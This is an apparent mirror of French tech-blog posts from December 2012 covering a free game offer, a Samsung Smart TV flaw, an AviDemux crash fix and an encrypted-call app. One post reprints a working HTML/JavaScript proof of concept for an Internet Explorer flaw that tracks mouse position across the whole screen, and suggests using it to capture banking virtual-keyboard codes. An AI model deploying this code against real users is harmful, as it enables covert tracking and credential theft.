PROJET AUTOBLOG


Korben

source: Korben

⇐ retour index

Mise à jour

Mise à jour de la base de données, veuillez patienter...

Duke Nukem 3D gratuit !

mercredi 12 décembre 2012 à 22:38

Dans ma vie, les jeux qui ont compté sont Day of Tentacle, Sim City 2000, Age of Empires, Little Big Adventure, Battlefield et... Duke Nukem 3D !

OUAIS !

Et la bonne nouvelle c'est que ce jeu culte sorti en 1996 est disponible en téléchargement gratuit et légal sur le site GoG jusqu'à  vendredi !

Ce serait vraiment dommage de s'en priver ! Un jeu violent, bourré d'humour et avec du pixel rempli de charme, ce n'est pas tous les jours qu'on peut en voir !

Si vous êtes un petit jeunot, c'est le moment de vous y mettre ! Vous ne le regretterez pas... Et pour les vieux cons comme moi, et bien, foncez aussi, ça vous fera rajeunir de quelques années.

A télécharger ici ! + le patch qui va bien pour passer tout ça en HD (Windows uniquement). Merci à Gundz !

Source

 

Hacking de télévision… On n’a pas fini de se marrer.

mercredi 12 décembre 2012 à 22:27

Les téléviseurs connectés, c'est de la balle ! On peut mater Youtube, accéder au net et bien sûr se faire pirater bien profond !

Un chercheur en sécurité travaillant pour la société ReVuln (Malte) a découvert dans les Smart TV connectées de Samsung une faille qui lui permet de trouver les adresses IP des téléviseurs. A partir de là, il peut y accéder directement et prendre le contrôle de la télé pour par exemple installer des logiciels vérolés, mettre à jour le firmware pour le remplacer par un truc encore plus troué, espionner les gens qui se trouvent devant l'appareil si la webcam et le micro sont branchés, pomper les fichiers se trouvant sur les périphériques USB connectés à la TV et bien sûr voler les identifiants aux services tiers auquel l'utilisateur est connecté.

La fête quoi !

Voici une explication plus détaillée en vidéo ! C'est vraiment le gros kiff, moi j'adore !

M’enfin, rassurez-vous, le chercheur ne révélera pas publiquement le détail de ses découvertes... Vous pouvez continuer à vous balader à poil devant votre SmartTV. Sachez toutefois qu'il n'y a pas que Samsung qui est victime de ce genre de failles... D'autres constructeurs, de Smart TV mais aussi de boitiers multimédias ou de TV Satellites sont aussi exposés à ce genre de manips.

Source

Une faille pour suivre les mouvements de souris des Internautes dans Internet Explorer

mercredi 12 décembre 2012 à 18:19

Holy shit ! Une faille de sécurité dans Internet Explorer présente dans les versions 6 à 10 permet à un attaquant de suivre et d'enregistrer tous les mouvements de votre souris, et cela sur tout l'écran, même si IE est réduit dans la barre des tâches ou inactif ! Pire, les touches comme CTRL, SHIFT ou ALT sont aussi interceptables.

Cette faille présente un intérêt certain pour qui souhaite récupérer les codes entrés sur les claviers virtuels. On retrouve la plupart de ces "claviers" sur les sites des banques par exemple et le pirate pourrait simplement en achetant un emplacement pour de la pub sur un site même très grand public, piéger celle-ci et intercepter les mouvements de souris des internautes. Ça semble d'ailleurs être déjà entré en production sur certains serveurs de ad exchange (serveurs de bannières).
Voici une démo en vidéo pour que vous voyiez ce que ça donne...

Et l'exploit est on ne peut plus simple à implémenter...

Exploit
-----------------
<!DOCTYPE html>
<html>
<head>
  <meta charset="utf-8" />
  <title>Exploit Demo</title>
  <script type="text/javascript">
    window.attachEvent("onload", function() {
      var detector = document.getElementById("detector");
      detector.attachEvent("onmousemove", function (e) {
        detector.innerHTML = e.screenX + ", " + e.screenY;
      });
      setInterval(function () {
        detector.fireEvent("onmousemove");
      }, 100);
    });
  </script>
</head>
<body>
  <div id="detector"></div>
</body>
</html>

Si cela vous intéresse, sachez qu'il y a une démo testable pour IE sur ce site et même un jeu pour vous entrainer au chti pérate...

Merci à Paul pour le partage

AviDemux plante sur Mac OSX

mercredi 12 décembre 2012 à 13:30

AviDemux est un bon petit logiciel open source pour qui veut convertir des fichiers vidéos. Il est dispo sous Windows, Linux et aussi Mac OSX. Seul hic, la version pour OSX compilée et disponible sur le site, ne fonctionne pas avec la version Lion et Mountain Lion. Quand j'ai lancé le binaire, l'application s'est fermée toute seule.

Quand on regarde les logs, on peut y voir ceci :

Dyld Error Message:
Library not loaded: /opt/local/lib/libiconv.2.dylib
Referenced from: /Applications/avidemux2.app/Contents/Resources/lib/libxml2.2.dylib
Reason: Incompatible library version: libxml2.2.dylib requires version 8.0.0 or later, but libiconv.2.dylib provides version 7.0.0

Alors comment faire pour qu'AviDemux refonctionne avec les dernières versions d'OSX ?

Et bien il suffit de placer ce binaire dans le répertoire d'Applications (comme d'hab) et de faire un clic droit sur Avidemux2.app et de sélectionner "Afficher le contenu du paquet"

menu AviDemux plante sur Mac OSX

Allez ensuite dans le répertoire Ressources/lib et supprimez les 2 bibliothèques qui posent problème, à savoir libiconv.2.dylib et libxml2.2.dylib :

lib AviDemux plante sur Mac OSX

Je ne garantis pas que tout fonctionne sans ces 2 bibliothèques, mais je n'ai pas rencontré de pépin (pas encore).

avidemux AviDemux plante sur Mac OSX

 

Photo

Comment chiffrer ses communications téléphoniques ?

mercredi 12 décembre 2012 à 10:30

Si vous cherchez un moyen de sécuriser vos appels téléphoniques en les chiffrant, je vous invite à télécharger et installer la version beta de Discretio sur votre téléphone Android. Mise au point par la société française MBDSYS (salut Nikita !), cette application (non backdoorée par le FBI) est open source et gratuite.

Voici comment ça fonctionne... Attention, c'est du chinois de cryptoanarchiste ;-)

Pour un appel entre 2 téléphones, il faut que Discretio soit installé sur les 2 appareils. Le client génère en local une clef privée et un certificat non signé (rsa2048bit/sha1) qui sera envoyé au webservice qui le fera signer, après vérification du numéro par un token envoyé par SMS. Ce certificat est ensuite utilisé pour établir une connexion TLS avec le serveur. (tlsv1.2, key exchange EDH (2048bits) + RSA pour signature, aes256 - mode GCM pour le chiffrement symétrique, sha384 en hash, pas de compression)

Le certificat reçu est validé par vérification complète de la chaine de signature (CA signant les certificats clients + CAroot). Une fois cette connexion établie, Discretio utilise le fingerprint du certificat pour autoriser le client ou non a accéder au service.

Lors de l’établissement d'une communication, Discretio utilise le protocole de signalisation SIP et la connexion au serveur est chiffrée en aes256/GCM. Les 2 clients utilisent les mêmes paramètres Diffie-Hellman (pré-généré, facteur premier de 2048bits) pour faire un échange Diffie-Hellman classique. Les clefs publiques des 2 correspondants sont alors échangées à travers SIP/TLS. Pour la partie rtp et RTCP, Discretio utilise pour le moment la libsrtp avec de l'aes128 en Counter Mode + un hmac-sha1 tronqué a 80bits pour authentifier les paquets. Cela évoluera probablement ensuite sur de l'aes256-GCM-sha1 ainsi que sur du ECDH pour les parties TLS et DH pour SRTP.

Bien que cela ne concerne que les appels, la société compte bien faire évoluer son outil vers le chiffrement de nouvelles fonctionnalité comme les SMS, messages vocaux, les appels visio...etc.

Je l'ai testé... En wifi, rien à redire, ça fonctionne impeccablement bien et il n'y a aucun lag (en tout cas, je n'ai rien ressenti). Par contre, en 3G, la conversation a été légèrement hachée... mais là, je ne pense pas que Discretio pourra y faire grand chose !